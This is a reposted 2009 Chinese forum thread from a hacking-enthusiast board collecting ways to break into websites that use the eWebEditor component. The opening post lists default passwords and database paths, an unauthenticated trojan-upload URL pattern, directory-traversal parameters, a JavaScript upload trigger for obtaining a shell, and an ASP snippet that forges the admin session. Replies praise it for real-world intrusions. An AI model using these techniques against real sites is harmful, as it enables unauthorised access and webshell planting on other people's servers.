标题:
[转载]
Ewebedit入侵大集合
[打印本页]
作者:
oooooo
时间:
2009-7-16 07:59
标题:
Ewebedit入侵大集合
Ewebeditor拿站的新技巧
Ewebeditor大家应该是再熟悉不过的吧?先用默认密码admin888登陆,不行就下载默认数据库‘/db/ewebeditor.mdb”,如果默认数据库也改了的话我们是不是就该放弃了呢?这里告诉大家我的经验!就是用密码admin999登陆,或者输入“/db/ewebeditor1013.mdb”就能下载到数据库了。这个方法有%80的几率能拿下目标!
-------------------------------------------------------------------------------------
eWebEditor的另类入侵
有一个办法可以在没有登陆eWebEditor的情况下传我们的ASP或ASA木马,但是前提条件是在数据库中的eWebeditor_Style表中上传类型有aaspsp或asa等后缀,如果有,用ewebeditor.asp来上传,它的语法是:http://网站名/ewebeditor/ewebeditor.asp?id=S_ID&style=S_Name,其中S_ID是在eWebeditor_Style表中有aaspsp或asa后缀的那一行的S_ID,S_Name是在eWebeditor_Style表中有aaspsp或asa后缀的那一行的S_Name字段名称。出现我们熟悉的eWebSoft在线编辑器的界面,就可以在相应的有aaspsp或asa等后缀的类型中上传了相应的asp或asa木马。
这种情况也是存在的,大都是先前网站被人入侵过,管理员把admin_login.asp、admin_style.asp、admin_default.asp等文件删了,但是忘了删除数据库中的aaspsp或asa等后缀,这样就造成可以不用登陆就可以上传木马。或者是入侵者修改密码,密码破解不了,但是他忘了擦掉脚印了
-------------------------------------------------------------------------------------
ewebeditor后台地址: ewebeditor/admin_login.asp 默认用户名 密码都是 admin admin
ewebeditor数据库地址: DB/Ewebeditor.mdb
1
ewebeditor遍历路径漏洞(当数据库只读的时候)
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.xxxxx.com/../.. 看到整个网站文件了
2
进入后台添加aaspsp文件,可以直接上传asp文件。
3
打开eWebEditorNet/upload.aspx,选择一个cer文件。
再在IE地址栏里面输入javascript:lbtnUpload.click();回车就得到shell了。查看源码就可以看到上传shell的地址。
4
:<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If
只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp
本帖隐藏的内容需要回复才可以浏览
作者:
猪猪
时间:
2009-7-16 10:24
这个我要。。。。。。。最近遇到很多 webeditor 不过貌似都成功了 不过我不嫌方法多 嘎嘎
作者:
流淚╮鮭鮭
时间:
2009-7-16 10:26
很不错。。。
追得收藏....
作者:
猪猪
时间:
2009-7-16 10:28
免费用户嘛 理所当然。。。。
作者:
EndTo偌枫
时间:
2009-7-16 10:57
顶顶了 学过
作者:
khjl1
时间:
2009-7-16 11:13
呵呵 看看还有些啥
作者:
changchang
时间:
2009-7-19 21:44
不错,可是自己遇到的都很邪门,
作者:
EndTo偌枫
时间:
2009-7-21 15:05
顶顶了 收藏
作者:
天长娶爱
时间:
2009-7-26 14:24
呵呵。。偶来学习哈
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2